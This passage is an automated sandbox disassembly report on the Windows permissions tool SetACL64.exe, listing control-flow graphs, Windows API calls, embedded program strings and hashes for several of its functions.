7ff7c1713f80 * 2 GetCurrentProcess OpenProcessToken GetLastError 1577->1586 1581->1543 1582->1581 1589 7ff7c17243dd-7ff7c17243fa call 7ff7c17488fc * 5 1582->1589 1583->1577 1584->1583 1584->1588 1614 7ff7c1723ed9-7ff7c1723ee2 1585->1614 1615 7ff7c1723ea1-7ff7c1723eb8 1585->1615 1616 7ff7c1724079-7ff7c1724095 1586->1616 1617 7ff7c1724042-7ff7c1724059 1586->1617 1605 7ff7c1724419-7ff7c172441e call 7ff7c17488fc 1588->1605 1589->1538 1619 7ff7c172441f-7ff7c1724424 call 7ff7c17488fc 1605->1619 1614->1586 1625 7ff7c1723ee4-7ff7c1723efb 1614->1625 1621 7ff7c1723eba-7ff7c1723ecd 1615->1621 1622 7ff7c1723ed3-7ff7c1723ed8 call 7ff7c17421a0 1615->1622 1626 7ff7c1724097-7ff7c17240ae 1616->1626 1627 7ff7c17240ce-7ff7c17240d0 1616->1627 1623 7ff7c172405b-7ff7c172406e 1617->1623 1624 7ff7c1724074 call 7ff7c17421a0 1617->1624 1643 7ff7c1724425-7ff7c172442a call 7ff7c17488fc 1619->1643 1621->1605 1621->1622 1622->1614 1623->1619 1623->1624 1624->1616 1632 7ff7c1723efd-7ff7c1723f10 1625->1632 1633 7ff7c1723f16 call 7ff7c17421a0 1625->1633 1634 7ff7c17240c9 call 7ff7c17421a0 1626->1634 1635 7ff7c17240b0-7ff7c17240c3 1626->1635 1636 7ff7c17241d8-7ff7c1724209 1627->1636 1637 7ff7c17240d6-7ff7c172415c call 7ff7c1713f80 * 2 call 7ff7c171d260 1627->1637 1632->1589 1632->1633 1633->1586 1634->1627 1635->1634 1635->1643 1639 7ff7c1724268-7ff7c1724294 1636->1639 1640 7ff7c172420b-7ff7c172420e 1636->1640 1688 7ff7c172415e-7ff7c1724175 1637->1688 1689 7ff7c1724196-7ff7c172419f 1637->1689 1651 7ff7c1724314-7ff7c1724320 1639->1651 1652 7ff7c1724296-7ff7c1724299 1639->1652 1649 7ff7c1724210-7ff7c1724220 1640->1649 1661 7ff7c172442b-7ff7c1724430 call 7ff7c17488fc 1643->1661 1655 7ff7c1724239-7ff7c1724266 1649->1655 1656 7ff7c1724222-7ff7c1724233 call 7ff7c173e4b0 1649->1656 1657 7ff7c1724322-7ff7c172432c call 7ff7c173e4b0 1651->1657 1658 7ff7c1724335-7ff7c1724341 1651->1658 1660 7ff7c17242a0-7ff7c17242b4 1652->1660 1655->1639 1655->1649 1656->1655 1682 7ff7c1724356-7ff7c172435b 1656->1682 1673 7ff7c1724331-7ff7c1724333 1657->1673 1665 7ff7c172435d-7ff7c1724367 call 7ff7c1724810 1658->1665 1666 7ff7c1724343-7ff7c1724354 call 7ff7c173e4b0 1658->1666 1668 7ff7c17242cd-7ff7c17242d2 1660->1668 1669 7ff7c17242b6-7ff7c17242c7 call 7ff7c173e4b0 1660->1669 1690 7ff7c17243b1-7ff7c17243dc call 7ff7c1742180 1665->1690 1691 7ff7c1724369-7ff7c1724372 1665->1691 1666->1665 1666->1682 1678 7ff7c17242ea-7ff7c1724312 1668->1678 1679 7ff7c17242d4-7ff7c17242e8 call 7ff7c173e4b0 1668->1679 1669->1668 1669->1682 1673->1658 1673->1682 1678->1651 1678->1660 1679->1678 1679->1682 1682->1690 1693 7ff7c1724177-7ff7c172418a 1688->1693 1694 7ff7c1724190-7ff7c1724195 call 7ff7c17421a0 1688->1694 1689->1636 1695 7ff7c17241a1-7ff7c17241b8 1689->1695 1696 7ff7c172439e-7ff7c17243a1 1691->1696 1697 7ff7c1724374-7ff7c1724396 call 7ff7c172a350 1691->1697 1693->1661 1693->1694 1694->1689 1703 7ff7c17241ba-7ff7c17241cd 1695->1703 1704 7ff7c17241d3 call 7ff7c17421a0 1695->1704 1700 7ff7c17243af 1696->1700 1701 7ff7c17243a3-7ff7c17243aa call 7ff7c173b2b0 1696->1701 1697->1690 1710 7ff7c1724398 1697->1710 1700->1690 1701->1700 1703->1589 1703->1704 1704->1636 1710->1696
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$ErrorLastProcess$CurrentOpenToken
                                                  • String ID: Prepare$Privilege 'Back up files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right$Privilege 'Restore files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right$Privilege 'Take ownership of files or other objects' could not be enabled. SetACL's powers are restricted. Better run SetACL with $SeRestorePrivilege$SeTakeOwnershipPrivilege
                                                  • API String ID: 6815931-1541018277
                                                  • Opcode ID: e7fd04f08fec1a0ecb78bb51fd9c432250016c32d835b16c80ef034a2c114e38
                                                  • Instruction ID: 24a0aa6039bf43965c28a0ae0a05a4ee6045b92417294ad788885dfbbc1ad43d
                                                  • Opcode Fuzzy Hash: e7fd04f08fec1a0ecb78bb51fd9c432250016c32d835b16c80ef034a2c114e38
                                                  • Instruction Fuzzy Hash: B0228572A1878281EB04AF5AE44436DE361FB897B4FD05135E69D43AEADFBCE091C710
                                                  Function 00007FF7C1722DCB Relevance: 46.0, APIs: 19, Strings: 7, Instructions: 532COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1711 7ff7c1722dcb-7ff7c1722dd3 1712 7ff7c1722dd9-7ff7c1722de1 1711->1712 1713 7ff7c172346c-7ff7c172347c call 7ff7c1744c18 1711->1713 1714 7ff7c1722de7-7ff7c1722deb 1712->1714 1715 7ff7c1723481-7ff7c1723495 call 7ff7c1744c18 1712->1715 1713->1715 1717 7ff7c1722ded-7ff7c1722dfd call 7ff7c1727b10 1714->1717 1718 7ff7c1722e03-7ff7c1722e0e 1714->1718 1723 7ff7c172349a-7ff7c17234aa call 7ff7c1744c18 1715->1723 1717->1718 1717->1723 1720 7ff7c1722e1a-7ff7c1722e32 1718->1720 1721 7ff7c1722e10-7ff7c1722e14 1718->1721 1727 7ff7c1722e4f-7ff7c1722e52 1720->1727 1728 7ff7c1722e34-7ff7c1722e4d call 7ff7c1709520 call 7ff7c17296d0 1720->1728 1725 7ff7c1722e90-7ff7c1722e9d 1721->1725 1726 7ff7c1722e16-7ff7c1722e18 1721->1726 1730 7ff7c17234af-7ff7c17234c4 call 7ff7c1744c18 1723->1730 1732 7ff7c17231e4 1725->1732 1733 7ff7c1722ea3-7ff7c1722ea5 1725->1733 1726->1720 1726->1725 1734 7ff7c1722e6f-7ff7c1722e82 call 7ff7c1709520 call 7ff7c172bc40 1727->1734 1735 7ff7c1722e54-7ff7c1722e66 call 7ff7c1709520 call 7ff7c172b710 1727->1735 1765 7ff7c1722e84-7ff7c1722e8a 1728->1765 1751 7ff7c17234c5-7ff7c17234da call 7ff7c1744c18 1730->1751 1738 7ff7c17231ea-7ff7c17231ec 1732->1738 1733->1732 1740 7ff7c1722eab-7ff7c1722ef7 1733->1740 1734->1765 1768 7ff7c1722e6b-7ff7c1722e6d 1735->1768 1744 7ff7c172331f-7ff7c17233b7 call 7ff7c1713f80 * 2 call 7ff7c171d260 1738->1744 1745 7ff7c17231f2-7ff7c17231f4 1738->1745 1747 7ff7c1722f57-7ff7c1722f7a 1740->1747 1748 7ff7c1722ef9-7ff7c1722f4f call 7ff7c17341a0 call 7ff7c1735f60 1740->1748 1818 7ff7c17233b9-7ff7c17233d3 1744->1818 1819 7ff7c17233f4-7ff7c1723400 1744->1819 1745->1744 1752 7ff7c17231fa-7ff7c1723207 1745->1752 1757 7ff7c1722f97-7ff7c1722fa9 1747->1757 1758 7ff7c1722f7c 1747->1758 1748->1747 1779 7ff7c17234db-7ff7c17234e0 call 7ff7c17488fc 1751->1779 1763 7ff7c1723209-7ff7c172320e call 7ff7c175de6c 1752->1763 1764 7ff7c1723211-7ff7c172323a call 7ff7c1709520 1752->1764 1760 7ff7c1722fb9-7ff7c1722fc0 1757->1760 1761 7ff7c1722fab-7ff7c1722fb2 1757->1761 1769 7ff7c1722f80-7ff7c1722f91 1758->1769 1770 7ff7c1722fd0-7ff7c1722fdf 1760->1770 1771 7ff7c1722fc2-7ff7c1722fc9 1760->1771 1761->1760 1763->1764 1791 7ff7c172323c-7ff7c1723256 1764->1791 1792 7ff7c1723276-7ff7c1723278 1764->1792 1765->1725 1765->1730 1768->1765 1785 7ff7c1722f93 1769->1785 1780 7ff7c1722fe1-7ff7c1722ff1 1770->1780 1781 7ff7c1723054-7ff7c17230f9 call 7ff7c1713f80 * 2 call 7ff7c171d260 1770->1781 1771->1770 1809 7ff7c17234e1-7ff7c17234e6 call 7ff7c17488fc 1779->1809 1788 7ff7c172300e-7ff7c1723011 1780->1788 1789 7ff7c1722ff3-7ff7c172300c call 7ff7c1709520 call 7ff7c17296d0 1780->1789 1859 7ff7c17230fb-7ff7c1723115 1781->1859 1860 7ff7c1723136-7ff7c1723142 1781->1860 1785->1757 1801 7ff7c172302e-7ff7c1723041 call 7ff7c1709520 call 7ff7c172bc40 1788->1801 1802 7ff7c1723013-7ff7c172302c call 7ff7c1709520 call 7ff7c172b710 1788->1802 1852 7ff7c1723043-7ff7c1723049 1789->1852 1799 7ff7c1723258-7ff7c172326b 1791->1799 1800 7ff7c1723271 call 7ff7c17421a0 1791->1800 1793 7ff7c172327a-7ff7c1723289 call 7ff7c173e1c0 1792->1793 1794 7ff7c1723299-7ff7c17232b1 1792->1794 1793->1794 1831 7ff7c172328b-7ff7c1723294 1793->1831 1806 7ff7c17232ce-7ff7c17232d1 1794->1806 1807 7ff7c17232b3-7ff7c17232cc call 7ff7c1709520 call 7ff7c17296d0 1794->1807 1799->1800 1812 7ff7c17234e7-7ff7c17234ec call 7ff7c17488fc 1799->1812 1800->1792 1801->1852 1802->1852 1821 7ff7c17232ee-7ff7c1723301 call 7ff7c1709520 call 7ff7c172e530 1806->1821 1822 7ff7c17232d3-7ff7c17232ec call 7ff7c1709520 call 7ff7c172b710 1806->1822 1875 7ff7c1723303-7ff7c1723309 1807->1875 1809->1812 1846 7ff7c17234ed-7ff7c1723502 call 7ff7c1744c18 1812->1846 1834 7ff7c17233ee-7ff7c17233f3 call 7ff7c17421a0 1818->1834 1835 7ff7c17233d5-7ff7c17233e8 1818->1835 1826 7ff7c172343d-7ff7c172346b call 7ff7c1742180 1819->1826 1827 7ff7c1723402-7ff7c172341c 1819->1827 1821->1875 1822->1875 1840 7ff7c1723437-7ff7c172343c call 7ff7c17421a0 1827->1840 1841 7ff7c172341e-7ff7c1723431 1827->1841 1831->1846 1834->1819 1835->1834 1849 7ff7c1723503-7ff7c1723508 call 7ff7c17488fc 1835->1849 1840->1826 1841->1840 1853 7ff7c1723509-7ff7c17235d7 call 7ff7c17488fc call 7ff7c1713f80 * 2 call 7ff7c171d260 1841->1853 1846->1849 1849->1853 1852->1751 1857 7ff7c172304f 1852->1857 1898 7ff7c17235d9-7ff7c17235f0 1853->1898 1899 7ff7c1723611-7ff7c17236e8 1853->1899 1868 7ff7c172317e-7ff7c17231ae 1857->1868 1870 7ff7c1723117-7ff7c172312a 1859->1870 1871 7ff7c1723130-7ff7c1723135 call 7ff7c17421a0 1859->1871 1860->1868 1874 7ff7c1723144-7ff7c172315e 1860->1874 1882 7ff7c17231c8-7ff7c17231e2 call 7ff7c17340e0 1868->1882 1883 7ff7c17231b0-7ff7c17231c3 call 7ff7c1736010 1868->1883 1870->1779 1870->1871 1871->1860 1880 7ff7c1723179 call 7ff7c17421a0 1874->1880 1881 7ff7c1723160-7ff7c1723173 1874->1881 1876 7ff7c172330b-7ff7c1723310 call 7ff7c175de6c 1875->1876 1877 7ff7c1723313-7ff7c1723319 1875->1877 1876->1877 1877->1744 1877->1846 1880->1868 1881->1809 1881->1880 1882->1738 1883->1882 1900 7ff7c172360b-7ff7c1723610 call 7ff7c17421a0 1898->1900 1901 7ff7c17235f2-7ff7c1723605 1898->1901 1905 7ff7c17236ea-7ff7c1723701 1899->1905 1906 7ff7c1723721-7ff7c17243dc call 7ff7c1742180 1899->1906 1900->1899 1901->1900 1903 7ff7c17243e3-7ff7c1724430 call 7ff7c17488fc * 13 1901->1903 1908 7ff7c172371c call 7ff7c17421a0 1905->1908 1909 7ff7c1723703-7ff7c1723716 1905->1909 1908->1906 1909->1908 1912 7ff7c17243dd-7ff7c17243e2 call 7ff7c17488fc 1909->1912 1912->1903
                                                  APIs
                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C17234DB
                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C17234E1
                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C17234E7
                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C1723503
                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C1723509
                                                    • Part of subcall function 00007FF7C172B710: RegEnumKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000001A1), ref: 00007FF7C172B812
                                                    • Part of subcall function 00007FF7C1709520: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C1709606
                                                    • Part of subcall function 00007FF7C1709520: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7C170960C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskEnum
                                                  • String ID: SetACL finished successfully.$/$Action 'reset children' was used without specifying whether to reset the DACL, SACL, or both. Nothing was reset.$Object path and/or object type not specified.$Prepare$Run$read
                                                  • API String ID: 1222371136-710240214
                                                  • Opcode ID: 6fd56c362ca3c0bd5d5ac0762c920353aa005472101274b7ea8be5c822556958
                                                  • Instruction ID: 8c88df4de652eab0d13b90fe2f467468cba1651b2b0dc0d4447832c139fff120
                                                  • Opcode Fuzzy Hash: 6fd56c362ca3c0bd5d5ac0762c920353aa005472101274b7ea8be5c822556958
                                                  • Instruction Fuzzy Hash: BF32A072A1968281EB14EF66E4843AAE361FB4D7A0FC04532D65D43AD7DFBCE151CB20
                                                  Function 00007FF7C1737715 Relevance: 30.4, APIs: 16, Strings: 1, Instructions: 600registryfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$Info$CloseErrorLastProcessSecurityShare$BufferCreateCurrentFileFreeHandleNamedOpenToken
                                                  • String ID: SeSecurityPrivilege
                                                  • API String ID: 4200377542-2333288578
                                                  • Opcode ID: 72c4d0f1dcd23645b0fd41c2eee2edcd0e185607ca5a744b2523e201e660a9b5
                                                  • Instruction ID: b60da2fe27666989aafac9c287a29adb5f06d260074a9dfd11d876dcc11140f6
                                                  • Opcode Fuzzy Hash: 72c4d0f1dcd23645b0fd41c2eee2edcd0e185607ca5a744b2523e201e660a9b5
                                                  • Instruction Fuzzy Hash: CD42A172A0878285EB10EF26D4447ADA361FB497A8FD04235DA5D47BDADFBCE580C360
                                                  Function 00007FF7C171DA7F Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129synchronizationCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2981 7ff7c171da7f-7ff7c171dabb SetEvent ReleaseMutex call 7ff7c17421a0 2985 7ff7c171dac1-7ff7c171e829 EnterCriticalSection CloseHandle call 7ff7c171e8c0 2981->2985 2986 7ff7c171d8d4-7ff7c171d8df 2981->2986 3021 7ff7c171e84e-7ff7c171e853 call 7ff7c17488fc 2985->3021 2987 7ff7c171d91a-7ff7c171d93e 2986->2987 2988 7ff7c171d8e1-7ff7c171d8fa 2986->2988 2993 7ff7c171d97a-7ff7c171d985 2987->2993 2994 7ff7c171d940-7ff7c171d959 2987->2994 2991 7ff7c171d8fc-7ff7c171d90f 2988->2991 2992 7ff7c171d915 call 7ff7c17421a0 2988->2992 2991->2992 2996 7ff7c171e854-7ff7c171e860 call 7ff7c17488fc * 3 2991->2996 2992->2987 3000 7ff7c171d987-7ff7c171d9a0 2993->3000 3001 7ff7c171d9c1-7ff7c171d9cc 2993->3001 2998 7ff7c171d95b-7ff7c171d96e 2994->2998 2999 7ff7c171d974-7ff7c171d979 call 7ff7c17421a0 2994->2999 3032 7ff7c171e865-7ff7c171e866 call 7ff7c17488fc 2996->3032 2998->2999 3008 7ff7c171e878-7ff7c171e87d call 7ff7c17488fc 2998->3008 2999->2993 3002 7ff7c171d9bb-7ff7c171d9c0 call 7ff7c17421a0 3000->3002 3003 7ff7c171d9a2-7ff7c171d9b5 3000->3003 3005 7ff7c171da07-7ff7c171da40 call 7ff7c1742180 3001->3005 3006 7ff7c171d9ce-7ff7c171d9e7 3001->3006 3002->3001 3003->3002 3010 7ff7c171e87e-7ff7c171e888 call 7ff7c17488fc 3003->3010 3013 7ff7c171d9e9-7ff7c171d9fc 3006->3013 3014 7ff7c171da02 call 7ff7c17421a0 3006->3014 3008->3010 3031 7ff7c171e88a-7ff7c171e88c 3010->3031 3010->3032 3013->3014 3013->3021 3014->3005 3021->2996 3037 7ff7c171e869-7ff7c171e877 call 7ff7c17488fc call 7ff7c1713e30 3031->3037 3038 7ff7c171e88e 3031->3038 3032->3037 3037->3008
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: CriticalEnterEventMutexReleaseSection
                                                  • String ID: %s$UNKNW,
                                                  • API String ID: 995701069-1666316639
                                                  • Opcode ID: 003888358cd9cecbf61ced5c3771de75027d33bda59ba79a7f963fd78033388b
                                                  • Instruction ID: 70f08c01b1d95545d0dbc03bb40ea7416394866ceae1e281ccc048534411da74
                                                  • Opcode Fuzzy Hash: 003888358cd9cecbf61ced5c3771de75027d33bda59ba79a7f963fd78033388b
                                                  • Instruction Fuzzy Hash: A3518E62A19A4285EF04EF56D55837DA365FB49BA4FD25434CA0E073A3DEBCE4448720
                                                  Function 00007FF7C173F3C0 Relevance: 13.7, APIs: 9, Instructions: 187COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 3145 7ff7c173f3c0-7ff7c173f3e8 3146 7ff7c173f3ea 3145->3146 3147 7ff7c173f3ed-7ff7c173f409 3145->3147 3146->3147 3148 7ff7c173f40e-7ff7c173f412 3147->3148 3149 7ff7c173f40b 3147->3149 3150 7ff7c173f419-7ff7c173f41e 3148->3150 3151 7ff7c173f414-7ff7c173f417 3148->3151 3149->3148 3152 7ff7c173f423-7ff7c173f45c LookupAccountNameW GetLastError 3150->3152 3153 7ff7c173f420 3150->3153 3151->3152 3154 7ff7c173f469-7ff7c173f487 3152->3154 3155 7ff7c173f45e-7ff7c173f464 GetLastError 3152->3155 3153->3152 3157 7ff7c173f489-7ff7c173f490 3154->3157 3158 7ff7c173f4e6-7ff7c173f4fd call 7ff7c1715790 3154->3158 3156 7ff7c173f62f-7ff7c173f646 3155->3156 3160 7ff7c173f4bb-7ff7c173f4c3 call 7ff7c17421d4 3157->3160 3161 7ff7c173f492-7ff7c173f499 3157->3161 3168 7ff7c173f502-7ff7c173f507 3158->3168 3169 7ff7c173f4ff 3158->3169 3171 7ff7c173f4c6-7ff7c173f4e1 call 7ff7c1744d90 3160->3171 3164 7ff7c173f49f-7ff7c173f4a7 call 7ff7c17421d4 3161->3164 3165 7ff7c173f653-7ff7c173f658 Concurrency::cancel_current_task 3161->3165 3176 7ff7c173f64d-7ff7c173f652 call 7ff7c17488fc 3164->3176 3177 7ff7c173f4ad-7ff7c173f4b9 3164->3177 3172 7ff7c173f509-7ff7c173f50c 3168->3172 3173 7ff7c173f50e-7ff7c173f513 3168->3173 3169->3168 3171->3158 3174 7ff7c173f518-7ff7c173f555 LookupAccountNameW 3172->3174 3173->3174 3175 7ff7c173f515 3173->3175 3179 7ff7c173f557-7ff7c173f55f GetLastError 3174->3179 3180 7ff7c173f561-7ff7c173f568 3174->3180 3175->3174 3176->3165 3177->3171 3183 7ff7c173f5bb-7ff7c173f5be 3179->3183 3184 7ff7c173f570-7ff7c173f579 3180->3184 3186 7ff7c173f5f9-7ff7c173f5fc 3183->3186 3187 7ff7c173f5c0-7ff7c173f5d9 3183->3187 3184->3184 3188 7ff7c173f57b-7ff7c173f589 call 7ff7c1713f80 3184->3188 3192 7ff7c173f5fe-7ff7c173f608 3186->3192 3193 7ff7c173f62d 3186->3193 3189 7ff7c173f5db-7ff7c173f5ee 3187->3189 3190 7ff7c173f5f0-7ff7c173f5f8 call 7ff7c17421a0 3187->3190 3188->3183 3201 7ff7c173f58b-7ff7c173f58e 3188->3201 3189->3190 3194 7ff7c173f647-7ff7c173f64c call 7ff7c17488fc 3189->3194 3190->3186 3197 7ff7c173f60a-7ff7c173f61d 3192->3197 3198 7ff7c173f622-7ff7c173f628 call 7ff7c17421a0 3192->3198 3193->3156 3194->3176 3197->3176 3202 7ff7c173f61f 3197->3202 3198->3193 3201->3183 3205 7ff7c173f590-7ff7c173f59b IsValidSid 3201->3205 3202->3198 3205->3183 3206 7ff7c173f59d-7ff7c173f5a4 3205->3206 3207 7ff7c173f5af-7ff7c173f5b7 call 7ff7c173ec20 3206->3207 3208 7ff7c173f5a6-7ff7c173f5ab call 7ff7c174d6ac 3206->3208 3207->3183 3208->3207
                                                  APIs
                                                  • LookupAccountNameW.ADVAPI32 ref: 00007FF7C173F44D
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000000,?,?,FFFFFFFF,?,00000001,00007FF7C173E9EF), ref: 00007FF7C173F453
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000000,?,?,FFFFFFFF,?,00000001,00007FF7C173E9EF), ref: 00007FF7C173F45E
                                                  • LookupAccountNameW.ADVAPI32 ref: 00007FF7C173F54D
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000000,?,?,FFFFFFFF,?,00000001,00007FF7C173E9EF), ref: 00007FF7C173F557
                                                  • IsValidSid.ADVAPI32(?,?,?,?,?,?,00000000,00000000,?,?,FFFFFFFF,?,00000001,00007FF7C173E9EF), ref: 00007FF7C173F593
                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C173F647
                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C173F64D
                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7C173F653
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$AccountLookupName_invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskValid
                                                  • String ID:
                                                  • API String ID: 311209037-0
                                                  • Opcode ID: c7e2f3c1dd69d1f4acddb5ab312ab4255335677c4fd2a3498e6ade446b79d788
                                                  • Instruction ID: df98df2db12b093d054b4f728fa6999c7ff6bd205a7d0b6c4252a78f598bb5ac
                                                  • Opcode Fuzzy Hash: c7e2f3c1dd69d1f4acddb5ab312ab4255335677c4fd2a3498e6ade446b79d788
                                                  • Instruction Fuzzy Hash: C9719422A18B8681EB24AF16A44436DB365FB49BF4FE40231DA5D07BD6DFBCE4508351
                                                  Function 00007FF7C171CD0A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 226registryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 3329 7ff7c171cd0a-7ff7c171cd24 call 7ff7c171d0a0 call 7ff7c1714fc0 3334 7ff7c171cd94-7ff7c171cd9c 3329->3334 3335 7ff7c171cd26-7ff7c171cd2e 3329->3335 3336 7ff7c171cd9e-7ff7c171cdb4 3334->3336 3337 7ff7c171cdd4-7ff7c171cdd9 3334->3337 3338 7ff7c171cd30-7ff7c171cd46 3335->3338 3339 7ff7c171cd66-7ff7c171cd91 3335->3339 3340 7ff7c171cdcf call 7ff7c17421a0 3336->3340 3341 7ff7c171cdb6-7ff7c171cdc9 3336->3341 3342 7ff7c171cddb-7ff7c171cdf1 call 7ff7c1713f80 3337->3342 3343 7ff7c171cdf6-7ff7c171ce19 call 7ff7c1709520 call 7ff7c173c0b0 3337->3343 3344 7ff7c171cd48-7ff7c171cd5b 3338->3344 3345 7ff7c171cd61 call 7ff7c17421a0 3338->3345 3339->3334 3340->3337 3341->3340 3346 7ff7c171d084-7ff7c171d089 call 7ff7c17488fc 3341->3346 3354 7ff7c171cf9c-7ff7c171cfd4 RegisterEventSourceW call 7ff7c174e62c 3342->3354 3362 7ff7c171ce89-7ff7c171ce91 3343->3362 3363 7ff7c171ce1b-7ff7c171ce23 3343->3363 3344->3345 3344->3346 3345->3339 3358 7ff7c171d08a-7ff7c171d08f call 7ff7c17488fc 3346->3358 3360 7ff7c171cfd9-7ff7c171cfe3 3354->3360 3376 7ff7c171d090-7ff7c171d095 call 7ff7c17488fc 3358->3376 3366 7ff7c171cff9-7ff7c171d004 3360->3366 3367 7ff7c171cfe5-7ff7c171cff7 call 7ff7c174e1f8 call 7ff7c171c3a0 3360->3367 3364 7ff7c171cec9-7ff7c171ceec call 7ff7c1709520 call 7ff7c173bf70 3362->3364 3365 7ff7c171ce93-7ff7c171cea9 3362->3365 3369 7ff7c171ce5b-7ff7c171ce86 3363->3369 3370 7ff7c171ce25-7ff7c171ce3b 3363->3370 3396 7ff7c171cf5c-7ff7c171cf64 3364->3396 3397 7ff7c171ceee-7ff7c171cef6 3364->3397 3372 7ff7c171ceab-7ff7c171cebe 3365->3372 3373 7ff7c171cec4 call 7ff7c17421a0 3365->3373 3371 